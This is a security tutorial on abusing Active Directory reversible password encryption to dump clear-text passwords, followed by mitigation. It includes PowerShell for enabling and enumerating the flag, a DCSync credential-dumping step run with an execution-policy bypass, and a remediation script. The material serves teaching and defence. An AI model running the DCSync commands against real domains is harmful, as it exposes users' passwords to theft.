Credential Dumping – Active Directory Reversible Encryption
Credential Dumping – Active Directory Reversible Encryption is a technique attackers use to recover user passwords in clear text from a Windows domain. MITRE ATT&CK describes it as adversaries abusing an Active Directory authentication property to obtain credentials. The AllowReversiblePasswordEncryption property controls whether the password is stored in a form the domain controller can decrypt, instead of as a one-way hash. Windows disables this setting by default, precisely so that credentials are not kept in a retrievable format. Legacy software or specific applications sometimes require it, and when an administrator enables it, every password set afterwards becomes recoverable by anyone who can read the directory data.
- MITRE Tactic: Credential Access (TA0006)
- MITRE Technique: Modify Authentication Process (T1556)
- MITRE Sub-technique: Reversible Encryption (T1556.005)
Once reversible encryption is enabled for a user account (or for the whole domain through password policy), the domain controller no longer stores only a hash of that password: it stores the password encrypted under a key held by the DC. Because encryption, unlike hashing, can be undone, anyone who can read that data, for example through directory replication, can decrypt it and obtain the original clear-text password.
Do you know?
As per Microsoft: If you use the Challenge Handshake Authentication Protocol (CHAP) through remote access or Internet Authentication Services (IAS), you must enable this policy setting. CHAP is an authentication protocol that is used by remote access and network connections. Similarly, Digest Authentication in Internet Information Services (IIS) also requires this policy setting to be enabled.
Table of Contents
- Lab Setup
- DCSync Attack: Dump Plaintext Password
- Mitigation
- Conclusion
Lab Setup
Enabling reversible encryption for Active Directory users
There are two ways to enable the reversible encryption property:
- User account property
Enable reversible encryption by modifying the account property of an individual domain user ("Store password using reversible encryption" on the Account tab in Active Directory Users and Computers), or with PowerShell:
PowerShell command
Set-ADUser -Identity <sAMAccountName> -AllowReversiblePasswordEncryption $true
- Group Policy Management
Enable "Store passwords using reversible encryption" under Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\. Set in the Default Domain Policy, this applies to every user in the domain, whereas the account property affects only that one account.
Validate the property through the user's properties, Attribute Editor tab: the userAccountControl attribute now includes the ENCRYPTED_TEXT_PWD_ALLOWED flag (0x80, decimal 128).
NOTE: Enabling the property does not convert the hash that is already stored. Only passwords set or changed after the property is enabled are stored reversibly, so in the lab the administrator must reset the user's password before the attack below will return a clear-text value; in the field, an adversary waits for exactly that reset.
Enumeration
PowerShell command to find users that have reversible password encryption enabled:
Get-ADUser -Filter {AllowReversiblePasswordEncryption -eq $true} | Select-Object Name, sAMAccountName
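The lab setup and enumeration steps above, carried through end to end as one added example (this is not code from the original article). It assumes the RSAT ActiveDirectory module on a domain-joined host with rights to modify the account, and a hypothetical lab user named labuser. Beyond the single command above, it also checks the userAccountControl bit directly with an LDAP bitwise filter, and checks the domain password policy, because a domain-wide policy stores every password reversibly without setting the per-user flag at all.

```powershell
# Added example (not part of the original article). Assumes the RSAT ActiveDirectory
# module and a hypothetical lab account 'labuser'.
Import-Module ActiveDirectory

$ENCRYPTED_TEXT_PWD_ALLOWED = 0x80   # userAccountControl bit set by AllowReversiblePasswordEncryption
$target = 'labuser'                  # hypothetical lab account

# 1. Enable the account property (same effect as the checkbox in ADUC).
Set-ADUser -Identity $target -AllowReversiblePasswordEncryption $true

# 2. Validate: the 0x80 bit must be present in userAccountControl and the
#    extended property must read back as True.
$u = Get-ADUser -Identity $target -Properties userAccountControl, AllowReversiblePasswordEncryption
$bitSet = ($u.userAccountControl -band $ENCRYPTED_TEXT_PWD_ALLOWED) -ne 0
'{0}: userAccountControl=0x{1:X} flag={2} property={3}' -f $u.SamAccountName, $u.userAccountControl, $bitSet, $u.AllowReversiblePasswordEncryption

# 3. Only passwords set AFTER the flag is enabled are stored reversibly, so reset
#    the lab password now (prompted; never hard-code a password in a script).
Set-ADAccountPassword -Identity $target -Reset -NewPassword (Read-Host -AsSecureString 'New lab password')

# 4. Enumerate every user with the flag, using the LDAP bitwise-AND matching rule
#    (1.2.840.113556.1.4.803) on userAccountControl rather than the extended property.
Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=128)' -Properties userAccountControl |
    Select-Object Name, SamAccountName, userAccountControl

# 5. The per-user flag is not the whole story: if the Default Domain Policy (or a
#    fine-grained password policy) enables reversible storage, all affected users
#    are exposed with no flag on their objects.
(Get-ADDefaultDomainPasswordPolicy).ReversibleEncryptionEnabled
Get-ADFineGrainedPasswordPolicy -Filter * | Select-Object Name, ReversibleEncryptionEnabled, AppliesTo
```

Step 4 is the query a blue team should schedule; step 5 is the check most audits forget, since a domain-wide policy leaves nothing to find on the individual user objects.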
Attack: DCSync
In our previous article we described the DCSync attack in detail. DCSync asks a domain controller to replicate directory data, including account secrets, so it requires an account with directory replication rights (for example a Domain Admin); it does not have to be run on the domain controller itself, although that is where we run it in this lab. The Invoke-DCSync.ps1 script used below is publicly available.
Commands to execute on the domain controller to retrieve the user's clear-text password:
powershell.exe -ep bypass
Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -AllData
DCSync returns the clear-text password of the target user alongside the usual hashes, because the reversibly stored value is replicated like any other account secret.
Mitigation
- Keep the Allow Reversible Password Encryption property disabled on every user account, and audit userAccountControl for the 0x80 flag regularly.
- Keep "Store passwords using reversible encryption" disabled in the Default Domain Policy and in any fine-grained password policy.
- Disabling the setting does not remove the reversibly stored value that already exists; it is replaced only when the password is next changed. After disabling the property, force a password change for every affected user.
- If an application genuinely requires CHAP or Digest authentication, isolate it to a dedicated account with minimal privileges rather than enabling the property domain-wide.
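The remediation described above as an added example (not code from the original article). It assumes the RSAT ActiveDirectory module and an account allowed to edit user objects and the Default Domain Policy; run it with -WhatIf first.

```powershell
# Added example (not part of the original article). Assumes the RSAT ActiveDirectory module.
# Finds every user with reversible encryption enabled, clears the flag, and forces a
# password change, because the stored clear-text value survives until the next change.
[CmdletBinding(SupportsShouldProcess)]
param()
Import-Module ActiveDirectory

# 1. Domain-wide policy: turn the setting off if it is on.
$policy = Get-ADDefaultDomainPasswordPolicy
if ($policy.ReversibleEncryptionEnabled) {
    if ($PSCmdlet.ShouldProcess('Default Domain Policy', 'Disable ReversibleEncryptionEnabled')) {
        Set-ADDefaultDomainPasswordPolicy -Identity $policy -ReversibleEncryptionEnabled $false
    }
}
Get-ADFineGrainedPasswordPolicy -Filter 'ReversibleEncryptionEnabled -eq $true' | ForEach-Object {
    if ($PSCmdlet.ShouldProcess($_.Name, 'Disable ReversibleEncryptionEnabled on PSO')) {
        Set-ADFineGrainedPasswordPolicy -Identity $_ -ReversibleEncryptionEnabled $false
    }
}

# 2. Per-user flag (userAccountControl bit 0x80 = 128).
$flagged = Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=128)' -Properties userAccountControl
foreach ($user in $flagged) {
    if ($PSCmdlet.ShouldProcess($user.SamAccountName, 'Clear reversible encryption and force password change')) {
        Set-ADUser -Identity $user -AllowReversiblePasswordEncryption $false
        # The existing reversibly stored value is only replaced at the next password change.
        Set-ADUser -Identity $user -ChangePasswordAtLogon $true
    }
}

# 3. Report what was touched so the change is traceable.
$flagged | Select-Object SamAccountName, DistinguishedName
```

Service accounts that cannot change their own password at logon need an administrator-driven reset instead of -ChangePasswordAtLogon; the script deliberately does not pick a new password on their behalf.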
Conclusion
In this article we recovered the clear-text passwords of Active Directory user accounts that had reversible encryption enabled, using DCSync. It can serve as a reference for red team operators on Credential Dumping – Active Directory plaintext passwords, and for defenders on where the setting hides and how to remove it.
Author: Faisal Khan, security analyst and expert in infrastructure security. Contact him on LinkedIn.